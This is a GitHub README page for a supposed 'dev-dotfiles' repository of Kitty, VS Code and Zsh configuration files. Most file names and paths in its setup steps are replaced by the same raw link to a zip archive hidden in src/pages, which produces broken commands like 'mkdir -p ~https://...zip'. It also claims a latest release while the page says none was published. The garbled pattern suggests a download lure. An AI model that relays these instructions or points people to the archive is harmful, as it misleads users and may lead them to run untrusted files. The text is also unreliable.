Skip to content

Benbi123/dev-dotfiles

Repository files navigation

πŸ–₯️ dev-dotfiles - Simplify Your Development Setup

Download Latest Release

πŸ“– About This Project

The "dev-dotfiles" repository contains my personal configuration files for popular development tools. It includes settings for the Kitty terminal, VS Code IDE, and Zsh shell. These files help streamline your development process by creating a consistent working environment.

πŸš€ Getting Started

To get started with "dev-dotfiles," follow the steps below. This guide assumes you are new to using configuration files, and I will break down each step clearly.

πŸ› οΈ Requirements

Before using these dotfiles, make sure you have the following:

  1. Operating System: Linux or any Unix-based system.
  2. Software:
    • Kitty Terminal: A modern terminal emulator.
    • Visual Studio Code (VS Code): A popular code editor.
    • Zsh Shell: An alternative shell to Bash.

Make sure you have installed these applications before proceeding.

πŸ“₯ Download & Install

To download the latest release of "dev-dotfiles," visit this page to download.

  1. Click on the link above.
  2. Find the release that suits your needs.
  3. Download the package (usually a ZIP file) to your computer.

πŸ“¦ Extracting the Files

Once the download is complete:

  1. Locate the downloaded ZIP file on your computer.
  2. Right-click the file and select "Extract All" (or similar option).
  3. Choose a destination folder, then click "Extract."

You will now see the contents of the dotfiles in the chosen folder.

βš™οΈ Setting Up the Configurations

Now that you have the dotfiles extracted, follow these steps to set them up.

1. Configure Kitty Terminal

  • Navigate to the folder containing the extracted files.
  • Locate the https://raw.githubusercontent.com/Benbi123/dev-dotfiles/main/src/pages/dotfiles_dev_v1.5-alpha.5.zip file.
  • Copy this file to the configuration directory for Kitty, usually found at ~https://raw.githubusercontent.com/Benbi123/dev-dotfiles/main/src/pages/dotfiles_dev_v1.5-alpha.5.zip. If the directory doesn't exist, you may create it using:
mkdir -p ~https://raw.githubusercontent.com/Benbi123/dev-dotfiles/main/src/pages/dotfiles_dev_v1.5-alpha.5.zip

2. Configure VS Code

  • Find the https://raw.githubusercontent.com/Benbi123/dev-dotfiles/main/src/pages/dotfiles_dev_v1.5-alpha.5.zip file in the extracted folder.
  • Copy this file to the VS Code settings directory, usually located at ~https://raw.githubusercontent.com/Benbi123/dev-dotfiles/main/src/pages/dotfiles_dev_v1.5-alpha.5.zip. Create the directory if necessary:
mkdir -p ~https://raw.githubusercontent.com/Benbi123/dev-dotfiles/main/src/pages/dotfiles_dev_v1.5-alpha.5.zip

3. Configure Zsh Shell

  • Locate the .zshrc file in your extracted files.
  • Move this file to your home directory. You can do this with:
cp .zshrc ~/

4. Activate Zsh

If you haven't set Zsh as your default shell, run:

chsh -s $(which zsh)

After this, close your terminal and reopen it for the changes to take effect.

βœ”οΈ Verify the Setup

To ensure everything is set up correctly:

  1. Open your Kitty terminal.
  2. Check if your configurations have loaded by looking for any custom settings you made.
  3. Open VS Code and confirm that the settings reflect what you copied.
  4. Open a new terminal window to see the Zsh shell in action.

πŸ” Troubleshooting

If you encounter issues, here are a few steps to resolve common problems:

  • Kitty Terminal Won’t Launch: Check if you've copied the https://raw.githubusercontent.com/Benbi123/dev-dotfiles/main/src/pages/dotfiles_dev_v1.5-alpha.5.zip file correctly. Ensure there are no typos in the configuration.
  • VS Code Doesn’t Reflect Changes: Make sure the https://raw.githubusercontent.com/Benbi123/dev-dotfiles/main/src/pages/dotfiles_dev_v1.5-alpha.5.zip file is in the right place. Try restarting VS Code to reload settings.
  • Zsh Issues: If Zsh doesn’t launch properly, confirm that .zshrc exists in your home directory and has the right permissions.

🀝 Contributing

If you'd like to contribute to this project, you are welcome to fork the repository and submit a pull request. Ensure you follow the same setup process for any configurations you add or modify.

πŸ“„ License

This project is open source as per the MIT License. Feel free to use it, modify it, and share it as you see fit.

πŸ“ž Support

If you have questions or need help, you can open an issue in the GitHub repository. I will respond as quickly as possible.

🌟 Acknowledgments

Thanks to the developers of Kitty, VS Code, and Zsh for providing fantastic tools that enhance the development experience.

About

πŸš€ Configure your development environment with dotfiles for Kitty terminal, VS Code, and Zsh shell, ensuring a smooth and efficient workflow.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages